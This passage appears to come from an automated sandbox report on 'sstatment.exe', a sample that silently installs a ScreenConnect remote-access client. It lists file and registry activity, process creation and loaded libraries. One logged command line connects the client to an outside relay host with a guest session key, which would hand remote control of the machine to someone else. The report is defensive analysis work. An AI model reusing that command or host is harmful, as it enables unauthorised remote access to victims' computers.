                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior

                              System Summary

                              barindex
                              Source: sstatment.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05350270 CreateProcessAsUserW,7_2_05350270
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5e3176.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{4904E32F-1F5B-2CE5-B18E-779BCD958764}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3407.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3417.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI367A.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5e3178.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5e3178.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4904E32F-1F5B-2CE5-B18E-779BCD958764}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4904E32F-1F5B-2CE5-B18E-779BCD958764}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{4904E32F-1F5B-2CE5-B18E-779BCD958764}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\ty2tyxrw.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\ty2tyxrw.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3417.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B4170BA8_2_00007FFD9B4170BA
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B421F328_2_00007FFD9B421F32
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B4110CF8_2_00007FFD9B4110CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B4110D78_2_00007FFD9B4110D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B725BC18_2_00007FFD9B725BC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7262838_2_00007FFD9B726283
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B725DD48_2_00007FFD9B725DD4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7229328_2_00007FFD9B722932
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B7268098_2_00007FFD9B726809
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B725C6A8_2_00007FFD9B725C6A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B3F10D79_2_00007FFD9B3F10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B3F10CF9_2_00007FFD9B3F10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B705BC69_2_00007FFD9B705BC6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70E3869_2_00007FFD9B70E386
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B7003FA9_2_00007FFD9B7003FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B706DFB9_2_00007FFD9B706DFB
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B70F1329_2_00007FFD9B70F132
                              Source: sstatment.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: sstatment.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: sstatment.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: sstatment.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: sstatment.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: sstatment.exe, 00000000.00000002.1719196628.0000000007A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1709255979.0000000005090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1713238462.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1713238462.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1713238462.00000000052E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1710557527.0000000005250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1705736414.0000000003CB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000F3F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000F3F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1716168698.000000000569C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1716168698.000000000569C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1716168698.000000000569C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1716168698.000000000569C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs sstatment.exe
                              Source: sstatment.exe, 00000000.00000002.1709040207.0000000005050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenamezlib.dll2 vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenamewixca.dll\ vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs sstatment.exe
                              Source: sstatment.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs sstatment.exe
                              Source: sstatment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.sstatment.exe.5250000.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.0.sstatment.exe.a163d8.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal42.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sstatment.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\sstatment.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: sstatment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: sstatment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\sstatment.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: sstatment.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: sstatment.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\sstatment.exeFile read: C:\Users\user\Desktop\sstatment.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\sstatment.exe "C:\Users\user\Desktop\sstatment.exe"
                              Source: C:\Users\user\Desktop\sstatment.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System"
                              Source: C:\Users\user\Desktop\sstatment.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\sstatment.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
